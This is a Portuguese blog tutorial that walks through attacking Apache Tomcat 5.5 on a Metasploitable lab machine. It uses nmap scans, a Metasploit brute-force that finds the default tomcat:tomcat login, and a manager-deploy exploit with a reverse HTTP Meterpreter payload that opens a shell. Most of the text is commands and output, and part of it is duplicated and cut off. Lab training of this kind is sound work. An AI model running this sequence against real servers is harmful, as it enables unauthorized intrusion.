Olá pessoal!
Vou começar aqui uma série de tutoriais, ensinando a exploitar algumas falhas mais comuns, para o pessoal que está começando. Se você seguiu o post de como montar um lab, provavelmente você tem uma distro Linux chamada Metasploitable.
Vamos usar as falhas dela nessa série. A vulnerabilidade de hoje está no Apache Tomcat 5.5.
Antes de sairmos exploitando tudo primeiro vamos saber o que estamos atacando.
O Apache Tomcat é um projeto colaborativo open source, feito em java, e sua função é ser um server web java. Essa vulnerabilidade que vamos explorar aqui pode ser encontrada em algumas versões, entre elas a 5.5 que está rodando no Metasploitable.
Antes de sair exploitando tudo o que ver pela frente vamos fazer um rápido reconhecimento do terreno. Para encontrar o server vamos usar o nmap. Primeiramente vamos fazer um ping scan para ver quantos hosts estão na rede.
attacker@blackoutlabs:~# nmap -sP 192.168.0.1/24
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:06 BRT
Nmap scan report for 192.168.0.1
Host is up (0.0028s latency).
MAC Address: 00:1E:58:C2:96:0B (D-Link)
Nmap scan report for 192.168.0.100
Host is up (0.065s latency).
MAC Address: D8:A2:5E:8D:BA:AF (Apple)
Nmap scan report for 192.168.0.101
Host is up (0.066s latency).
MAC Address: 1C:4B:D6:4F:C7:3D (AzureWave)
Nmap scan report for 192.168.0.104
Host is up (0.15s latency).
MAC Address: 0C:74:C2:BA:CE:51 (Apple)
Nmap scan report for 192.168.0.105
Host is up (0.071s latency).
MAC Address: A4:D1:D2:0C:EF:F5 (Apple)
Nmap scan report for 192.168.0.106
Host is up.
Nmap scan report for 192.168.0.107
Host is up (0.00050s latency).
MAC Address: C8:9C:DC:44:FC:6A (Elitegroup Computer System CO.)
Nmap scan report for 192.168.0.108
Host is up (0.00048s latency).
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Nmap scan report for 192.168.0.109
Host is up (0.055s latency).
MAC Address: E8:11:32:AD:57:9D (Samsung Electronics Co.)
Nmap done: 256 IP addresses (9 hosts up) scanned in 4.68 seconds
Opa bastante pcs, lab todo ligado
E agora? Qual será o nosso alvo?
Novamente com o nmap vamos escanear os ips até encontrar nosso alvo
attacker@blackoutlabs:~# nmap -A 192.168.0.108
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:05 BRT
Nmap scan report for 192.168.0.108
Host is up (0.00062s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17 14:07:45
|_Not valid after: 2010-04-16 14:07:45
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_http-title: Site doesn’t have a title (text/html).
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 – 2.6.31
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2012-08-24 20:06:02 UTC-4
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.0.108
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.20 seconds
Opa parece que achamos! Não foi de primeira, levei um tempinho para achar ele ali hehe…
Agora temos algumas informações interessantes. Temos o Apache Tomcat 5.5 rodando na porta 8180 (lembre-se disso). Pronto! Já sabemos onde ele está agora vamos brincar com ele um pouco.
Para explorar-mos esse serviço vamos usar o Framework Metasploit e procurar algum exploit para o tomcat.
attacker@blackoutlabs:~# msfconsole
_ _
/ \ / \ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
+ — – =[metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — – =[ 927 exploits - 499 auxiliary - 151 post]
+ — – =[ 251 payloads - 28 encoders - 8 nops]
msf> search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
Opa temos alguns exploits interessantes. Vamos usar o tomcat_mgr_login para fazer um bruteforce. Antes de invadir precisamos de um user/pass válido.
msf> use auxiliary/scanner/http/tomcat_mgr_login
msf (tomcat_mgr_login)> show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
—- ————— ——– ———–
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
Bom, esse exploit precisa de bastante coisas. Vamos acrescentar o host que encontramos antes, a porta (lembra qual era? Sempre preste atenção nisso), caso ele não encontre com os usuarios e senhas padrão vamos acrescentar nossas wordlists em PASS_FILE e USER_FILE e caso ele não encontre no diretório padrão precisaremos mudar isso também em URI.
msf (tomcat_mgr_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf (tomcat_mgr_login) > set RHOSTS 192.168.0.108
RHOSTS => 192.168.0.108
msf (tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_login) > exploit
[*][192.168.0.108:8180 TOMCAT_MGR - [01/45] – Trying username:’admin’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [01/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [02/45] – Trying username:’manager’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [02/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [03/45] – Trying username:’role1′ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [03/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [04/45] – Trying username:’root’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [04/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [05/45] – Trying username:’tomcat’ with password:’tomcat’
[+][http://192.168.0.108:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’
[*][192.168.0.108:8180 TOMCAT_MGR - [06/45] – Trying username:’both’ with password:’both’
[-][192.168.0.108:8180 TOMCAT_MGR - [06/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [07/45] – Trying username:’j2deployer’ with password:’j2deployer’
[-][192.168.0.108:8180 TOMCAT_MGR - [07/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘j2deployer’
[*][192.168.0.108:8180 TOMCAT_MGR - [08/45] – Trying username:’ovwebusr’ with password:’ovwebusr’
[-][192.168.0.108:8180 TOMCAT_MGR - [08/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*][192.168.0.108:8180 TOMCAT_MGR - [09/45] – Trying username:’cxsdk’ with password:’cxsdk’
[-][192.168.0.108:8180 TOMCAT_MGR - [09/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*][192.168.0.108:8180 TOMCAT_MGR - [10/45] – Trying username:’ADMIN’ with password:’ADMIN’
[-][192.168.0.108:8180 TOMCAT_MGR - [10/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ADMIN’
[*][192.168.0.108:8180 TOMCAT_MGR - [11/45] – Trying username:’xampp’ with password:’xampp’
[-][192.168.0.108:8180 TOMCAT_MGR - [11/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘xampp’
[*][192.168.0.108:8180 TOMCAT_MGR - [12/45] – Trying username:’ovwebusr’ with password:’OvW*busr1′
[-][192.168.0.108:8180 TOMCAT_MGR - [12/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*][192.168.0.108:8180 TOMCAT_MGR - [13/45] – Trying username:’cxsdk’ with password:’kdsxc’
[-][192.168.0.108:8180 TOMCAT_MGR - [13/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*][192.168.0.108:8180 TOMCAT_MGR - [14/45] – Trying username:’root’ with password:’owaspbwa’
[-][192.168.0.108:8180 TOMCAT_MGR - [14/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [15/45] – Trying username:’admin’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [15/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [16/45] – Trying username:’admin’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [16/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [17/45] – Trying username:’admin’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [17/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [18/45] – Trying username:’admin’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [18/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [19/45] – Trying username:’admin’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [19/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [20/45] – Trying username:’manager’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [20/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [21/45] – Trying username:’manager’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [21/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [22/45] – Trying username:’manager’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [22/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [23/45] – Trying username:’manager’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [23/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [24/45] – Trying username:’manager’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [24/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [25/45] – Trying username:’role1′ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [25/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [26/45] – Trying username:’role1′ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [26/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [27/45] – Trying username:’role1′ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [27/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [28/45] – Trying username:’role1′ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [28/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [29/45] – Trying username:’role1′ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [29/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [30/45] – Trying username:’root’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [30/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [31/45] – Trying username:’root’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [31/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [32/45] – Trying username:’root’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [32/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [33/45] – Trying username:’root’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [33/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [34/45] – Trying username:’root’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [34/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [35/45] – Trying username:’both’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [35/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [36/45] – Trying username:’both’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [36/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [37/45] – Trying username:’both’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [37/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [38/45] – Trying username:’both’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [38/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [39/45] – Trying username:’both’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [39/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [40/45] – Trying username:’both’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [40/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][Scanned 1 of 1 hosts (100% complete)
[*][Auxiliary module execution completed
Opa! Se analizar bem essa saída podemos ver que com a wordlist padrão já encontramos uma combinação user:pass (tomcat:tomcat). Nem vamos precisar de wordlist nesse caso. Ele também encontrou que o diretório padrão é válido, logo, não precisamos testar outro. Então agora vamos procurar nosso exploit de verdade.
msf (tomcat_mgr_login) > search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
O exploit que nós vamos usar é o mgr_deploy, com um payload reverse_http. Vamos preencher com as informações que já conseguimos.
msf (tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf (tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf (tomcat_mgr_deploy) > set RHOST 192.168.0.108
RHOST => 192.168.0.108
msf (tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf (tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf (tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf (tomcat_mgr_deploy) > set PAYLOAD java/meterpreter/reverse_http
PAYLOAD => java/meterpreter/reverse_http
msf (tomcat_mgr_deploy) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf (tomcat_mgr_deploy) > exploit
[*][Started HTTP reverse handler on http://192.168.0.106:8443/
[*][Attempting to automatically select a target...
[*][Automatically selected target "Linux x86"
[*][Uploading 6465 bytes as D3YHKcK8TOful.war ...
[*][Executing /D3YHKcK8TOful/qh3Q6Qaf2NVdciS7ngfbkqIBa04HxV.jsp...
[*][Undeploying D3YHKcK8TOful ...
[*][192.168.0.108:51231 Request received for /INITJM...
Java: /INITJM
URL: "http://192.168.0.106:8443/FDnj_4IdkGPMI9c8doStx/\x00"
[*][Meterpreter session 2 opened (192.168.0.106:8443 -> 192.168.0.108:51231) at 2012-08-24 20:37:12 -0300
meterpreter >
Pronto! Conseguimos, estamos dentro, vamos rodar alguns comandos para confirmar.
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > ifconfig
Interface 1
============
Name : lo – lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 2
============
Name : eth0 – eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.0.108
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe45:2ce8
IPv6 Netmask : ::
meterpreter > shell
Process 1 created.
Channel 1 created.
$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
$ whoami
tomcat55
$ ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
$ cd /tmp
$ pwd
/tmp
$ ls
4729.jsvc_up
cache37pgy7jar
cache37pgy8jar
$ halt
halt: Need to be root
E estamos mesmo dentro! Podemos ver pelo comando whoami que estamos no user tomcat55. Podemos passear e utilizar alguns comandos no sistema, mas não temos muitos privilégios. Pode-se notar isso no último comando que retornou “Need to be root”. Precisamos escalar privilégios e conseguir acesso root para brincar mais.
Mas essa parte fica para outro post, já que esse era apenas para conhecer a vulnerabilidade e os exploits.
Opa descobri como atacar e por onde que se entra, mas e agora, como eu arrumo isso?
Bom, não se tem muita coisa a fazer nesse ponto, mas vamos a elas:
Por hoje era isso! Já vimos 1 das falhas do Metasploitable, já já teremos mais.
Vou começar aqui uma série de tutoriais, ensinando a exploitar algumas falhas mais comuns, para o pessoal que está começando. Se você seguiu o post de como montar um lab, provavelmente você tem uma distro Linux chamada Metasploitable.
Vamos usar as falhas dela nessa série. A vulnerabilidade de hoje está no Apache Tomcat 5.5.
Antes de sairmos exploitando tudo primeiro vamos saber o que estamos atacando.
O Apache Tomcat é um projeto colaborativo open source, feito em java, e sua função é ser um server web java. Essa vulnerabilidade que vamos explorar aqui pode ser encontrada em algumas versões, entre elas a 5.5 que está rodando no Metasploitable.
O que vamos precisar?
- Vitima rodando uma versão vulnerável do Apache Tomcat
- Distro de pentest com o Framework Metasploit
- Uma boa wordlist
- nmap ou qualquer outro port scanner
Localizando o alvo
Antes de sair exploitando tudo o que ver pela frente vamos fazer um rápido reconhecimento do terreno. Para encontrar o server vamos usar o nmap. Primeiramente vamos fazer um ping scan para ver quantos hosts estão na rede.
attacker@blackoutlabs:~# nmap -sP 192.168.0.1/24
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:06 BRT
Nmap scan report for 192.168.0.1
Host is up (0.0028s latency).
MAC Address: 00:1E:58:C2:96:0B (D-Link)
Nmap scan report for 192.168.0.100
Host is up (0.065s latency).
MAC Address: D8:A2:5E:8D:BA:AF (Apple)
Nmap scan report for 192.168.0.101
Host is up (0.066s latency).
MAC Address: 1C:4B:D6:4F:C7:3D (AzureWave)
Nmap scan report for 192.168.0.104
Host is up (0.15s latency).
MAC Address: 0C:74:C2:BA:CE:51 (Apple)
Nmap scan report for 192.168.0.105
Host is up (0.071s latency).
MAC Address: A4:D1:D2:0C:EF:F5 (Apple)
Nmap scan report for 192.168.0.106
Host is up.
Nmap scan report for 192.168.0.107
Host is up (0.00050s latency).
MAC Address: C8:9C:DC:44:FC:6A (Elitegroup Computer System CO.)
Nmap scan report for 192.168.0.108
Host is up (0.00048s latency).
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Nmap scan report for 192.168.0.109
Host is up (0.055s latency).
MAC Address: E8:11:32:AD:57:9D (Samsung Electronics Co.)
Nmap done: 256 IP addresses (9 hosts up) scanned in 4.68 seconds
Opa bastante pcs, lab todo ligado
E agora? Qual será o nosso alvo?
Novamente com o nmap vamos escanear os ips até encontrar nosso alvo
attacker@blackoutlabs:~# nmap -A 192.168.0.108
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:05 BRT
Nmap scan report for 192.168.0.108
Host is up (0.00062s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17 14:07:45
|_Not valid after: 2010-04-16 14:07:45
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_http-title: Site doesn’t have a title (text/html).
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 – 2.6.31
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2012-08-24 20:06:02 UTC-4
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.0.108
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.20 seconds
Opa parece que achamos! Não foi de primeira, levei um tempinho para achar ele ali hehe…
Agora temos algumas informações interessantes. Temos o Apache Tomcat 5.5 rodando na porta 8180 (lembre-se disso). Pronto! Já sabemos onde ele está agora vamos brincar com ele um pouco.
Explorando
Para explorar-mos esse serviço vamos usar o Framework Metasploit e procurar algum exploit para o tomcat.
attacker@blackoutlabs:~# msfconsole
_ _
/ \ / \ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
+ — – =[metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — – =[ 927 exploits - 499 auxiliary - 151 post]
